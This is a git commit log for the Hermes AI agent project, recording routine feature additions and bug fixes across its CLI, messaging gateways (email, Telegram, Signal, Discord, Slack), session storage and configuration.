   hermes_cli/skills_config.py PLATFORMS dicts so they appear in
   'hermes tools' and 'hermes skills' CLI commands.

3. Add full email setup documentation:
   - website/docs/user-guide/messaging/email.md — setup guide with
     Gmail/Outlook instructions, configuration, troubleshooting,
     security advice, and env var reference
   - Update messaging/index.md — add email to architecture diagram,
     platform toolset table, security examples, and next steps
2026-03-11 06:34:32 -07:00
teknium1
184aa5b2b3 fix: tighten exc_info assertion in vision test (from PR #803)
The weaker assertion (r.exc_info is not None) passes even when
exc_info is (None, None, None). Check r.exc_info[0] is not None
to verify actual exception info is present.

The _aux_async_client mock was already applied on main.

Co-authored-by: OutThisLife <nickolasgustafsson@gmail.com>
2026-03-11 06:32:01 -07:00
0xbyt4
bdcf247efe feat: add email gateway platform (IMAP/SMTP)
Allow users to interact with Hermes by sending and receiving emails.
Uses IMAP polling for incoming messages and SMTP for replies with
proper threading (In-Reply-To, References headers).

Integrates with all 14 gateway extension points: config, adapter
factory, authorization, send_message tool, cron delivery, toolsets,
prompt hints, channel directory, setup wizard, status display, and
env example.

65 tests covering config, parsing, dispatch, threading, IMAP fetch,
SMTP send, attachments, and all integration points.
2026-03-11 06:32:01 -07:00
Teknium
b16d7f2da6 Merge pull request #921 from NousResearch/hermes/hermes-ece5a45c
feat(cli): add /reasoning command for effort level and display toggle
2026-03-11 06:30:20 -07:00
teknium1
9423fda5cb feat: configurable subagent provider:model with full credential resolution
Adds delegation.model and delegation.provider config fields so subagents
can run on a completely different provider:model pair than the parent agent.

When delegation.provider is set, the system resolves the full credential
bundle (base_url, api_key, api_mode) via resolve_runtime_provider() —
the same path used by CLI/gateway startup. This means all configured
providers work out of the box: openrouter, nous, zai, kimi-coding,
minimax, minimax-cn.

Key design decisions:
- Provider resolution uses hermes_cli.runtime_provider (single source of
  truth for credential resolution across CLI, gateway, cron, and now
  delegation)
- When only delegation.model is set (no provider), the model name changes
  but parent credentials are inherited (for switching models within the
  same provider like OpenRouter)
- When delegation.provider is set, full credentials are resolved
  independently — enabling cross-provider delegation (e.g. parent on
  Nous Portal, subagents on OpenRouter)
- Clear error messages if provider resolution fails (missing API key,
  unknown provider name)
- _load_config() now falls back to hermes_cli.config.load_config() for
  gateway/cron contexts where CLI_CONFIG is unavailable

Based on PR #791 by 0xbyt4 (closes #609), reworked to use proper
provider credential resolution instead of passing provider as metadata.

Co-authored-by: 0xbyt4 <0xbyt4@users.noreply.github.com>
2026-03-11 06:12:21 -07:00
teknium1
4d873f77c1 feat(cli): add /reasoning command for effort level and display toggle
Combined implementation of reasoning management:
- /reasoning              Show current effort level and display state
- /reasoning <level>      Set reasoning effort (none, low, medium, high, xhigh)
- /reasoning show|on      Show model thinking/reasoning in output
- /reasoning hide|off     Hide model thinking/reasoning from output

Effort level changes persist to config and force agent re-init.
Display toggle updates the agent callback dynamically without re-init.

When display is enabled:
- Intermediate reasoning shown as dim [thinking] lines during tool loops
- Final reasoning shown in a bordered box above the response
- Long reasoning collapsed (5 lines intermediate, 10 lines final)

Also adds:
- reasoning_callback parameter to AIAgent
- last_reasoning in run_conversation result dict
- show_reasoning config option (display section, default: false)
- Display section in /config output
- 34 tests covering both features

Combines functionality from PR #789 and PR #790.

Co-authored-by: Aum Desai <Aum08Desai@users.noreply.github.com>
Co-authored-by: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
2026-03-11 06:02:18 -07:00
teknium1
09336a6710 Merge PR #795: fix: handle empty choices in MCP sampling callback
Adds defensive guard against empty/None/missing choices in SamplingHandler.__call__
before accessing response.choices[0]. Returns proper ErrorData instead of crashing
with IndexError/TypeError on content filtering, provider errors, or rate limits.

Authored by 0xbyt4.

Co-authored-by: 0xbyt4 <0xbyt4@users.noreply.github.com>
2026-03-11 05:47:51 -07:00
aydnOktay
9149c34a26 refactor(slack): replace print statements with structured logging
Replaces all ad-hoc print() calls in the Slack gateway adapter with
proper logging.getLogger(__name__) calls, matching the pattern already
used by every other platform adapter (telegram, discord, whatsapp,
signal, homeassistant).

Changes:
- Add import logging + module-level logger
- Use logger.error for failures, logger.warning for non-critical
  fallbacks, logger.info for status, logger.debug for routine ops
- Add exc_info=True for full stack traces on all error/warning paths
- Use %s format strings (lazy evaluation) instead of f-strings
- Wrap disconnect() in try/except for safety
- Add structured context (file paths, channel IDs, URLs) to log messages
- Convert document handling prints added after the original PR

Cherry-picked from PR #778 by aydnOktay, rebased onto current main
with conflict resolution and extended to cover document/video methods
added since the PR was created.

Co-authored-by: aydnOktay <xaydinoktay@gmail.com>
2026-03-11 05:34:43 -07:00
teknium1
c837ef949d fix: replace debug print() with logger.error() in file_tools
Stray print() in write_file_tool exception handler leaked debug output
to stdout. Replaced with logger.error() which is already set up in
the file.

Authored by memosr.

Co-authored-by: memosr <memosr@users.noreply.github.com>
2026-03-11 04:38:07 -07:00
balyan.sid@gmail.com
1d4a23fa6c fix: add missing packages to setuptools config for non-editable installs
- Add `agent`, `tools.*`, `gateway.*` to packages.find include
- Add `hermes_state`, `hermes_time`, `mini_swe_runner`, `rl_cli`, `utils` to py-modules
- Move rl_training_tool LOGS_DIR to ~/.hermes/logs/rl_training/ (was writing
  into the package source tree, which fails on read-only installs)

These were masked in development (editable installs see the whole source tree)
but broke any non-editable install like `pip install .` or wheel builds.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-11 17:07:29 +05:30
teknium1
a71736ea73 Merge PR #910: fix: add missing Responses API parameters for Codex provider
Adds tool_choice=auto, parallel_tool_calls=true, and prompt_cache_key
to Codex Responses API requests, matching the official Codex CLI.
Root cause fix for #747 (agent claiming no shell access).
2026-03-11 04:28:52 -07:00
teknium1
a82ce60294 fix: add missing Responses API parameters for Codex provider
Adds tool_choice, parallel_tool_calls, and prompt_cache_key to the
Codex Responses API request kwargs — matching what the official Codex
CLI sends.

- tool_choice: 'auto' — enables the model to proactively call tools.
  Without this, the model may default to not using tools, which explains
  reports of the agent claiming it lacks shell access (#747).
- parallel_tool_calls: True — allows the model to issue multiple tool
  calls in a single turn for efficiency.
- prompt_cache_key: session_id — enables server-side prompt caching
  across turns in the same session, reducing latency and cost.

Refs #747
2026-03-11 04:28:31 -07:00
teknium1
69090d6da1 fix: add **kwargs to base/telegram media send methods for metadata routing
The MEDIA routing in _process_message_background passes
metadata=_thread_metadata to send_video, send_document, and
send_image_file — but none accepted it, causing TypeError silently
caught by the except handler. Files just failed to send.

Fix: add **kwargs to all four base class media methods and their
Telegram overrides.
2026-03-11 03:24:39 -07:00
teknium1
322ffbed61 Merge PR #779: feat: Telegram native file attachment support (send_document + send_video)
Adds send_document() and send_video() overrides to TelegramAdapter.
Requested by TigerHix.
2026-03-11 03:23:11 -07:00
Teknium
fe9da5280f Merge pull request #766 from spanishflu-est1918/codex/telegram-topic-session-pr
Isolate Telegram forum topic sessions — each topic gets its own independent session key, history, and interrupt tracking. Progress, hygiene, and cron messages all route to the correct topic.
2026-03-11 03:14:43 -07:00
teknium1
4864a5684a refactor: extract shared curses checklist, fix skill discovery perf
Four cleanups to code merged today:

1. New hermes_cli/curses_ui.py — shared curses_checklist() used by both
   hermes tools and hermes skills. Eliminates ~140 lines of near-identical
   curses code (scrolling, key handling, color setup, numbered fallback).

2. Fix _find_all_skills() perf — was calling load_config() per skill
   (~100+ YAML parses). Now loads disabled set once via
   _get_disabled_skill_names() and does a set lookup.

3. Eliminate _list_all_skills_unfiltered() duplication — _find_all_skills()
   now accepts skip_disabled=True for the config UI, removing 30 lines
   of copy-pasted discovery logic from skills_config.py.

4. Fix fragile label round-trip in skills_command — was building label
   strings, passing to checklist, then mapping labels back to skill names
   (collision-prone). Now works with indices directly, like tools_config.
2026-03-11 03:06:15 -07:00
alireza78a
f1510ec33e test(terminal): add tests for env var validation in _get_env_config 2026-03-11 02:59:12 -07:00
alireza78a
4523cc09cf fix(terminal): validate env var types with clear error messages 2026-03-11 02:59:12 -07:00
teknium1
f524aed23e fix: clean up empty file after failed wl-paste clipboard extraction
When wl-paste produces empty output, the destination file was left as
a 0-byte orphan. Added dest.unlink() before returning False, matching
the existing cleanup pattern in the exception handler.

Authored by 0xbyt4.

Co-authored-by: 0xbyt4 <0xbyt4@users.noreply.github.com>
2026-03-11 02:56:19 -07:00
teknium1
925f378baa Merge PR #773: feat(cli,gateway): add /personality none and custom personality support
Authored by teyrebaz33. Closes #643.

- /personality none/default/neutral clears system prompt overlay
- Dict format personalities with description, tone, style fields
- Works in both CLI and gateway
- 18 tests
2026-03-11 02:54:27 -07:00
teknium1
fe29594716 fix: replace blocking time.sleep with await asyncio.sleep in WhatsApp connect
time.sleep(1) inside async def connect() blocks the entire event loop.
Replaced with await asyncio.sleep(1) to properly yield control.

Authored by 0xbyt4. Fixes blocking sleep in WhatsApp bridge startup.

Co-authored-by: 0xbyt4 <0xbyt4@users.noreply.github.com>
2026-03-11 02:51:49 -07:00
teknium1
7721518591 Merge PR #770: fix: off-by-one in setup toggle selection error message
Authored by 0xbyt4. Error message showed 'between 1 and N+1' instead
of 'between 1 and N' for N items.
2026-03-11 02:50:52 -07:00
teknium1
6e303def12 Merge PR #757: security: enforce 0600/0700 file permissions on sensitive files
Enforces owner-only permissions on files containing secrets:
- config.yaml, .env → 0600
- ~/.hermes/, cron dirs → 0700
- cron jobs.json, output files → 0600

Windows-safe (all chmod calls wrapped in try/except).
Inspired by openclaw v2026.3.7.
2026-03-11 02:48:56 -07:00
teknium1
ad1fbd88b2 Merge feature/background-command: add /background slash command
Adds /background <prompt> command to both CLI and gateway platforms.
Spawns a new agent session in the background — users can keep chatting
while the task runs, and results are delivered when done.

CLI: threaded execution with rich Panel output
Gateway: asyncio task with platform adapter delivery (text, images, media)

Includes 15 new tests and updates to command registry.
2026-03-11 02:46:37 -07:00
teknium1
b8067ac27e feat: add /background command to gateway and CLI commands registry
Add /background <prompt> to the gateway, allowing users on Telegram,
Discord, Slack, etc. to fire off a prompt in a separate agent session.
The result is delivered back to the same chat when done, without
modifying the active conversation history.

Implementation:
- _handle_background_command: validates input, spawns asyncio task
- _run_background_task: creates AIAgent in executor thread, delivers
  result (text, images, media files) back via the platform adapter
- Inherits model, toolsets, provider routing from gateway config
- Error handling with user-visible failure messages

Also adds /background to hermes_cli/commands.py registry so it
appears in /help and autocomplete.

Tests: 15 new tests covering usage, task creation, uniqueness,
multi-platform, error paths, and help/autocomplete integration.
2026-03-11 02:46:31 -07:00
teknium1
bd2606a576 fix: initialize self.config in HermesCLI to fix AttributeError on slash commands
HermesCLI.__init__ never assigned self.config, causing an
AttributeError ('HermesCLI' object has no attribute 'config')
whenever an unrecognized slash command fell through to the
quick_commands check on line 2838. This affected skill slash
commands like /x-thread-creation since the quick_commands lookup
runs before the skill command check.

Set self.config = CLI_CONFIG in __init__ to match the pattern used
by the gateway (run.py:199).
2026-03-11 02:33:31 -07:00
teknium1
f5324f9aa5 fix: initialize self.config in HermesCLI to fix AttributeError on slash commands
HermesCLI.__init__ never assigned self.config, causing an
AttributeError ('HermesCLI object has no attribute config')
whenever an unrecognized slash command fell through to the
quick_commands check (line 2832). This broke skill slash commands
like /x-thread-creation since the quick_commands lookup runs
before the skill command check.

Set self.config = CLI_CONFIG in __init__, matching the pattern
used by the gateway (run.py:199).
2026-03-11 02:33:25 -07:00
SPANISH FLU
de2b881886 test(cron): cover topic thread delivery metadata 2026-03-11 09:22:32 +01:00
SPANISH FLU
0d6b25274c fix(gateway): isolate telegram forum topic sessions 2026-03-11 09:15:34 +01:00
teknium1
fbfdde496b docs: update AGENTS.md with new files and test count
- Add hermes_cli/ files: skills_config, tools_config, skills_hub, models, auth
- Add acp_adapter/ directory
- Update test count: ~2500 → ~3000 (~3 min runtime)
2026-03-11 00:54:49 -07:00
Bartok Moltbot
ae1c11c5a5 fix(cli): resolve duplicate 'skills' subparser crash on Python 3.11+
Fixes #898 — Python 3.11 changed argparse to raise an exception on
duplicate subparser names (CPython #94331). The 'skills' name was
registered twice: once for Skills Hub and once for skills config.

Changes:
- Remove duplicate 'skills' subparser registration
- Add 'config' as a sub-action under the existing 'hermes skills' command
- Route 'hermes skills config' to skills_config module
- Add regression test to catch future duplicates

Migration: 'hermes skills' (config) is now 'hermes skills config'
2026-03-11 00:50:39 -07:00
Teknium
5abee4fb23 Merge pull request #769 from 0xbyt4/fix/codex-models-visibility-mismatch
Minor defensive fix — accept both 'hide' and 'hidden' visibility values in codex model filtering.
2026-03-11 00:49:59 -07:00
teknium1
331af8df23 fix: clean up tools --summary output and type annotations
- Use Optional[List[str]] instead of List[str] | None (consistency)
- Add header, per-platform counts, and checkmark list format
- Matches the visual style of the interactive configurator
2026-03-11 00:47:26 -07:00
teknium1
3a2fd1a5c9 Merge PR #767: feat: add --summary flag to hermes tools
Authored by luisv-1. Adds hermes tools --summary for a quick
non-interactive view of enabled tools per platform.
2026-03-11 00:46:32 -07:00
teknium1
2e1aa1b424 docs: add iteration budget pressure section to configuration guide
Documents the two-tier budget warning system from PR #762:
- Explains caution (70%) and warning (90%) thresholds
- Table showing what the model sees at each tier
- Notes on how injection preserves prompt caching
- Links to max_turns config
2026-03-11 00:40:44 -07:00
teknium1
aead9c8ead chore: remove unnecessary pragma comments from Telegram adapter
Strip 18 '# pragma: no cover - defensive logging' annotations — these
are real code paths, not worth excluding from coverage.
2026-03-11 00:37:45 -07:00
teknium1
93230af7bd Merge PR #763: improve Telegram gateway error handling and logging
Authored by aydnOktay. Replaces print() statements with structured
logging calls (error/warning/info/debug) throughout the Telegram
adapter. Adds exc_info=True for stack traces on failures.
2026-03-11 00:37:28 -07:00
teknium1
21ff0d39ad feat: iteration budget pressure via tool result injection
Two-tier warning system that nudges the LLM as it approaches
max_iterations, injected into the last tool result JSON rather
than as a separate system message:

- Caution (70%): {"_budget_warning": "[BUDGET: 42/60...]"}
- Warning (90%): {"_budget_warning": "[BUDGET WARNING: 54/60...]"}

For JSON tool results, adds a _budget_warning field to the existing
dict. For plain text results, appends the warning as text.

Key properties:
- No system messages injected mid-conversation
- No changes to message structure
- Prompt cache stays valid
- Configurable thresholds (0.7 / 0.9)
- Can be disabled: _budget_pressure_enabled = False

Inspired by PR #421 (@Bartok9) and issue #414.
8 tests covering thresholds, edge cases, JSON and text injection.
2026-03-11 00:37:24 -07:00
teknium1
4b619c9672 Merge PR #761: Improve Discord gateway error handling and logging
Authored by aydnOktay. Replaces bare print statements with structured
logger calls (error/warning/info) and adds exc_info=True for stack
traces on failure paths.
2026-03-11 00:35:31 -07:00
teknium1
c5321298ce docs: add quick commands documentation
Documents the quick_commands config feature from PR #746:
- configuration.md: full section with examples (server status, disk,
  gpu, update), behavior notes (timeout, priority, works everywhere)
- cli.md: brief section with config example + link to config guide
2026-03-11 00:28:52 -07:00
teknium1
359352b947 Merge PR #755: fix: head+tail truncation for execute_code stdout
Replaces head-only stdout capture with 40/60 head/tail split so final
print() output is never lost. 3 new tests.
2026-03-11 00:26:26 -07:00
teknium1
a9241f3e3e fix: head+tail truncation for execute_code stdout
Replaces head-only stdout capture with a two-buffer approach (40% head,
60% tail rolling window) so scripts that print() their final results
at the end never lose them. Adds truncation notice between sections.

Cherry-picked from PR #755, conflict resolved (test file additions).

3 new tests for short output, head+tail preservation, and notice format.
2026-03-11 00:26:13 -07:00
teknium1
ea0a263434 Merge PR #758: feat(discord): add DISCORD_ALLOW_BOTS config for bot message filtering
Adds configurable bot message filtering via DISCORD_ALLOW_BOTS env var:
- 'none' (default): ignore all bot messages
- 'mentions': accept bots only when they @mention us
- 'all': accept all bot messages

Includes 8 tests.
2026-03-11 00:25:51 -07:00
teknium1
3be6e8a5f2 Merge PR #746: feat(cli,gateway): add user-defined quick commands that bypass agent loop
Authored by teyrebaz33. Adds config-driven quick commands that execute
shell commands without invoking the LLM — zero token usage, works from
Telegram/Discord/Slack/etc. Closes #744.
2026-03-11 00:24:34 -07:00
teknium1
2b244762e1 feat: add missing commands to categorized /help
Post-merge follow-up to PR #752 — adds 10 commands that were added
since the PR was submitted:

Session: /title, /compress, /rollback
Configuration: /provider, /verbose, /skin
Tools & Skills: /reload-mcp (+ full /skills description)
Info: /usage, /insights, /paste

Also preserved existing color formatting (_cprint, _GOLD, _BOLD, _DIM)
and skill commands section from main.
2026-03-10 23:49:03 -07:00
teknium1
a169a656b4 Merge PR #743: feat: hermes skills — enable/disable individual skills and categories
Authored by teyrebaz33. Fixes #642.
2026-03-10 23:46:42 -07:00
teknium1
a9fdd8dc3c Merge PR #752: feat(ux): improve /help formatting with command categories
Authored by Bartok9. Organizes /help output into categories (Session,
Configuration, Tools & Skills, Info, Exit) for better readability.
Fixes #640.
2026-03-10 23:45:41 -07:00
Bartok Moltbot
8eb9eed074 feat(ux): improve /help formatting with command categories (#640)
- Organize COMMANDS into COMMANDS_BY_CATEGORY dict
- Group commands: Session, Configuration, Tools & Skills, Info, Exit
- Add visual category headers with spacing
- Maintain backwards compat via flat COMMANDS dict
- Better visual hierarchy and scannability

Before:
  /help           - Show this help message
  /tools          - List available tools
  ... (dense list)

After:
  ── Session ──
    /new           Start a new conversation
    /reset         Reset conversation only
    ...

  ── Configuration ──
    /config        Show current configuration
    ...

Closes #640
2026-03-10 23:45:36 -07:00
teknium1
909e048ad4 fix: integration hardening for gateway token tracking
Follow-up to 58dbd81 — ensures smooth transition for existing users:

- Backward compat: old session files without last_prompt_tokens
  default to 0 via data.get('last_prompt_tokens', 0)
- /compress, /undo, /retry: reset last_prompt_tokens to 0 after
  rewriting transcripts (stale token counts would under-report)
- Auto-compression hygiene: reset last_prompt_tokens after rewriting
- update_session: use None sentinel (not 0) as default so callers
  can explicitly reset to 0 while normal calls don't clobber
- 6 new tests covering: default value, serialization roundtrip,
  old-format migration, set/reset/no-change semantics
- /reset: new SessionEntry naturally gets last_prompt_tokens=0

2942 tests pass.
2026-03-10 23:40:24 -07:00
teyrebaz33
5eb62ef423 test(gateway): add regression test for /retry response fix
Adds two tests for _handle_retry_command: verifies /retry returns the
agent response (not None), and verifies graceful handling when no
previous message exists.

Cherry-picked from PR #731 by teyrebaz33. Regression coverage for
the fix merged in PR #441.

Co-authored-by: teyrebaz33 <teyrebaz33@users.noreply.github.com>
2026-03-10 23:34:52 -07:00
teknium1
58dbd81f03 fix: use actual API token counts for gateway compression pre-check
Root cause of aggressive gateway compression vs CLI:
- CLI: single AIAgent persists across conversation, uses real API-reported
  prompt_tokens for compression decisions — accurate
- Gateway: each message creates fresh AIAgent, token count discarded after,
  next message pre-check falls back to rough str(msg)//4 estimate which
  overestimates 30-50% on tool-heavy conversations

Fix:
- Add last_prompt_tokens field to SessionEntry — stores the actual
  API-reported prompt token count from the most recent agent turn
- After run_conversation(), extract context_compressor.last_prompt_tokens
  and persist it via update_session()
- Gateway pre-check now uses stored actual tokens when available (exact
  same accuracy as CLI), falling back to rough estimate with 1.4x safety
  factor only for the first message of a session

This makes gateway compression behave identically to CLI compression
for all turns after the first. Reported by TigerHix.
2026-03-10 23:28:23 -07:00
Teknium
a35c37a2f9 Merge pull request #891 from NousResearch/hermes/hermes-b0162f8d
fix: sort Nous Portal model list (opus first, sonnet lower)
2026-03-10 23:21:01 -07:00
teknium1
1518734e59 fix: sort Nous Portal model list (opus first, sonnet lower)
fetch_nous_models() returned models in whatever order the API gave
them, which put sonnet near the top. Add a priority sort so users
see the best models first: opus > pro > other > sonnet.
2026-03-10 23:20:46 -07:00
teknium1
67b9470207 fix: reduce premature gateway compression on tool-heavy sessions
The gateway's session hygiene pre-check uses a rough char-based token
estimate (total_chars / 4) to decide whether to compress before the
agent starts. This significantly overestimates for tool-heavy and
code-heavy conversations because:

1. str(msg) on dicts includes Python repr overhead (keys, brackets, etc.)
2. Code/JSON tokenizes at 5-7+ chars/token, not the assumed 4

This caused users with 200k context to see compression trigger at
~100-113k actual tokens instead of the expected 170k (85% threshold).
Reported by TigerHix on Twitter.

Fix: apply a 1.4x safety factor to the gateway pre-check threshold.
This pre-check is only meant to catch pathologically large transcripts
— the agent's own compression uses actual API-reported token counts
for precise threshold management.
2026-03-10 23:16:49 -07:00
teknium1
586fe5d62d Merge PR #724: feat: --yolo flag to bypass all approval prompts
Authored by dmahan93. Adds HERMES_YOLO_MODE env var and --yolo CLI flag
to auto-approve all dangerous command prompts.

Post-merge: renamed --fuck-it-ship-it to --yolo for brevity,
resolved conflict with --checkpoints flag.
2026-03-10 20:56:30 -07:00
teknium1
2d80ef7872 fix: _init_agent returns bool, not agent — fix quiet mode crash 2026-03-10 20:49:03 -07:00
Teknium
b76cae94d4 Merge pull request #889 from NousResearch/hermes/hermes-b0162f8d
fix: Docker backend fails when docker is not in PATH (macOS gateway)
2026-03-10 20:45:34 -07:00
teknium1
23270d41b9 feat: add --quiet/-Q flag for programmatic single-query mode
Adds -Q/--quiet to `hermes chat` for use by external orchestrators
(Paperclip, scripts, CI). When combined with -q, suppresses:
- Banner and ASCII art
- Spinner animations
- Tool preview lines (┊ prefix)

Only outputs:
- The agent's final response text
- A parseable 'session_id: <id>' line for session resumption

Usage: hermes chat -q 'Do something' -Q
Used by: Paperclip adapter (@nousresearch/paperclip-adapter-hermes)
2026-03-10 20:45:28 -07:00
teknium1
24479625a2 fix: Docker backend fails when docker is not in PATH (macOS gateway)
On macOS, Docker Desktop installs the CLI to /usr/local/bin/docker, but
when Hermes runs as a gateway service (launchd) or in other non-login
contexts, /usr/local/bin is often not in PATH. This causes the Docker
requirements check to fail with 'No such file or directory: docker' even
though docker works fine from the user's terminal.

Add find_docker() helper that uses shutil.which() first, then probes
common Docker Desktop install paths on macOS (/usr/local/bin,
/opt/homebrew/bin, Docker.app bundle). The resolved path is cached and
passed to mini-swe-agent via its 'executable' parameter.

- tools/environments/docker.py: add find_docker(), use it in
  _storage_opt_supported() and pass to _Docker(executable=...)
- tools/terminal_tool.py: use find_docker() in requirements check
- tests/tools/test_docker_find.py: 4 tests (PATH, fallback, not found, cache)

2877 tests pass.
2026-03-10 20:45:13 -07:00
arceus77-7
d41a214c1a feat(skills): add official optional 1password skill 2026-03-10 20:45:29 -04:00
vilkasdev
d502952bac fix(cli): add loading indicators for slow slash commands
Shows an immediate status message and braille spinner for slow slash
commands (/skills search|browse|inspect|install, /reload-mcp). Makes
input read-only while the command runs so the CLI doesn't appear frozen.

Cherry-picked from PR #714 by vilkasdev, rebased onto current main
with conflict resolution and bug fix (get_hint_text duplicate return).

Fixes #636

Co-authored-by: vilkasdev <vilkasdev@users.noreply.github.com>
2026-03-10 17:31:00 -07:00
Teknium
ac53bf1d71 Merge pull request #881 from NousResearch/hermes/hermes-b0162f8d
fix: provider selection not persisting when switching via hermes model
2026-03-10 17:13:26 -07:00
teknium1
145c57fc01 fix: provider selection not persisting when switching via hermes model
Two related bugs prevented users from reliably switching providers:

1. OPENAI_BASE_URL poisoning OpenRouter resolution: When a user with a
   custom endpoint ran /model openrouter:model, _resolve_openrouter_runtime
   picked up OPENAI_BASE_URL instead of the OpenRouter URL, causing model
   validation to probe the wrong API and reject valid models.

   Fix: skip OPENAI_BASE_URL when requested_provider is explicitly
   'openrouter'.

2. Provider never saved to config: _save_model_choice() could save
   config.model as a plain string. All five _model_flow_* functions then
   checked isinstance(model, dict) before writing the provider — which
   silently failed on strings. With no provider in config, auto-detection
   would pick up stale credentials (e.g. Codex desktop app) instead of
   the user's explicit choice.

   Fix: _save_model_choice() now always saves as dict format. All flow
   functions also normalize string->dict as a safety net before writing
   provider.

Adds 4 regression tests. 2873 tests pass.
2026-03-10 17:12:34 -07:00
teknium1
2dddfce08c fix: log prefill parse errors + clean up cron scheduler tests
Follow-up to PR #716 (0xbyt4):
- Log the third remaining silent except-pass in scheduler (prefill
  messages JSON parse failure)
- Fix test mock: run → run_conversation (matches actual agent API)
- Remove unused imports (asyncio, AsyncMock)
- Add test for prefill_messages parse failure logging
2026-03-10 17:10:01 -07:00
teknium1
03a4f184e6 fix: call _stop_training_run on early-return failure paths
The 4 early-return paths in _spawn_training_run (API exit, trainer
exit, env not found, env exit) were doing manual process.terminate()
or returning without cleanup, leaking open log file handles. Now all
paths call _stop_training_run() which handles both process termination
and file handle closure.

Also adds 12 tests for _stop_training_run covering file handle
cleanup, process termination, status transitions, and edge cases.

Inspired by PR #715 (0xbyt4) which identified the early-return issue.
Core file handle fix was already on main via e28dc13 (memosr.eth).
2026-03-10 17:09:51 -07:00
teknium1
be2e259596 Merge PR #716: fix: log exceptions instead of silently swallowing in cron scheduler
Authored by 0xbyt4. Replaces two except-Exception-pass blocks with
logger.warning() calls and adds tests for both paths.
2026-03-10 17:05:59 -07:00
teknium1
05bc8b19fe Merge PR #713: docs: clarify Telegram token regex constraint
Authored by VolodymyrBg.
2026-03-10 16:59:54 -07:00
teknium1
cb6b70bbfb Merge PR #709: fix: close log file handles to prevent resource leaks
Authored by memosr. Fixes bare open() calls in browser_tool.py and
unclosed log file handles in rl_training_tool.py.
2026-03-10 16:26:29 -07:00
teknium1
a458b535c9 fix: improve read-loop detection — consecutive-only, correct thresholds, fix bugs
Follow-up to PR #705 (merged from 0xbyt4). Addresses several issues:

1. CONSECUTIVE-ONLY TRACKING: Redesigned the read/search tracker to only
   warn/block on truly consecutive identical calls. Any other tool call
   in between (write, patch, terminal, etc.) resets the counter via
   notify_other_tool_call(), called from handle_function_call() in
   model_tools.py. This prevents false blocks in read→edit→verify flows.

2. THRESHOLD ADJUSTMENT: Warn on 3rd consecutive (was 2nd), block on
   4th+ consecutive (was 3rd+). Gives the model more room before
   intervening.

3. TUPLE UNPACKING BUG: Fixed get_read_files_summary() which crashed on
   search keys (5-tuple) when trying to unpack as 3-tuple. Now uses a
   separate read_history set that only tracks file reads.

4. WEB_EXTRACT DOCSTRING: Reverted incorrect removal of 'title' from
   web_extract return docs in code_execution_tool.py — the field IS
   returned by web_tools.py.

5. TESTS: Rewrote test_read_loop_detection.py (35 tests) to cover
   consecutive-only behavior, notify_other_tool_call, interleaved
   read/search, and summary-unaffected-by-searches.
2026-03-10 16:25:41 -07:00
teknium1
b53d5dad67 Merge PR #705: fix: detect, warn, and block file re-read/search loops after context compression
Authored by 0xbyt4. Adds read/search loop detection, file history injection after compression, and todo filtering for active items only.
2026-03-10 16:17:03 -07:00
teknium1
ad7a16dca6 fix: remove left/right borders from response box for easier copy-paste
Use rich_box.HORIZONTALS instead of the default ROUNDED box style
for the agent response panel. This keeps the top/bottom horizontal
rules (with title) but removes the vertical │ borders on left and
right, making it much easier to copy-paste response text from the
terminal.
2026-03-10 15:59:08 -07:00
teknium1
6e851a1f6a Merge PR #873: fix: eliminate 3x SQLite message duplication in gateway sessions
Fixes #860.
2026-03-10 15:29:24 -07:00
teknium1
c1171fe666 fix: eliminate 3x SQLite message duplication in gateway sessions (#860)
Three separate code paths all wrote to the same SQLite state.db with
no deduplication, inflating session transcripts by 3-4x:

1. _log_msg_to_db() — wrote each message individually after append
2. _flush_messages_to_session_db() — re-wrote ALL new messages at
   every _persist_session() call (~18 exit points), with no tracking
   of what was already written
3. gateway append_to_transcript() — wrote everything a third time
   after the agent returned

Since load_transcript() prefers SQLite over JSONL, the inflated data
was loaded on every session resume, causing proportional token waste.

Fix:
- Remove _log_msg_to_db() and all 16 call sites (redundant with flush)
- Add _last_flushed_db_idx tracking in _flush_messages_to_session_db()
  so repeated _persist_session() calls only write truly new messages
- Reset flush cursor on compression (new session ID)
- Add skip_db parameter to SessionStore.append_to_transcript() so the
  gateway skips SQLite writes when the agent already persisted them
- Gateway now passes skip_db=True for agent-managed messages, still
  writes to JSONL as backup

Verified: a 12-message CLI session with tool calls produces exactly
12 SQLite rows with zero duplicates (previously would be 36-48).

Tests: 9 new tests covering flush deduplication, skip_db behavior,
compression reset, and initialization. Full suite passes (2869 tests).
2026-03-10 15:22:44 -07:00
teknium1
2210068f5b Merge: fix(signal) align send() signature with base class 2026-03-10 15:18:31 -07:00
teknium1
d6ab35c1a3 fix(signal): align send() signature with base class (content, reply_to, metadata)
Signal's send() used 'text' instead of 'content' and 'reply_to_message_id'
instead of 'reply_to', mismatching BasePlatformAdapter.send(). Callers in
gateway/run.py use keyword args matching the base interface, so Signal's
send() was missing its required 'text' positional arg.

Fixes: 'SignalAdapter.send() missing 1 required positional argument: text'
2026-03-10 15:18:26 -07:00
teknium1
5fc751e543 Merge: fix(gateway) add metadata param to _keep_typing and base send_typing 2026-03-10 15:08:45 -07:00
teknium1
cea78c5e27 fix(gateway): add metadata param to _keep_typing and base send_typing
_keep_typing() was called with metadata= for thread-aware typing
indicators, but neither it nor the base send_typing() accepted
that parameter. Most adapter overrides (Slack, Discord, Telegram,
WhatsApp, HA) already accept metadata=None, but the base class
and Signal adapter did not.

- Add metadata=None to BasePlatformAdapter.send_typing()
- Add metadata=None to BasePlatformAdapter._keep_typing(), pass through
- Add metadata=None to SignalAdapter.send_typing()

Fixes TypeError in _process_message_background for Signal.
2026-03-10 15:08:40 -07:00
teknium1
53be6afe92 Merge PR #871: fix(signal): use media_urls/media_types in MessageEvent construction 2026-03-10 15:00:08 -07:00
teknium1
d04b9f4dc5 fix(signal): use media_urls/media_types instead of non-existent image_paths/audio_path/document_paths
The Signal adapter was passing image_paths, audio_path, and document_paths
to MessageEvent.__init__(), but those fields don't exist on the dataclass.
MessageEvent uses media_urls (List[str]) and media_types (List[str]).

Changes:
- Replace separate image_paths/audio_path/document_paths with unified
  media_urls and media_types lists (matching Discord, Slack, etc.)
- Add _ext_to_mime() helper to map file extensions to MIME types
- Use Signal's contentType from attachment metadata when available,
  falling back to extension-based mapping
- Update message type detection to check media_types prefixes

Fixes TypeError: MessageEvent.__init__() got an unexpected keyword
argument 'image_paths'
2026-03-10 14:58:16 -07:00
arceus777@proton.me
d94519c5ba fix(skills): classify local skills separately in skills list 2026-03-10 17:22:36 -04:00
Erosika
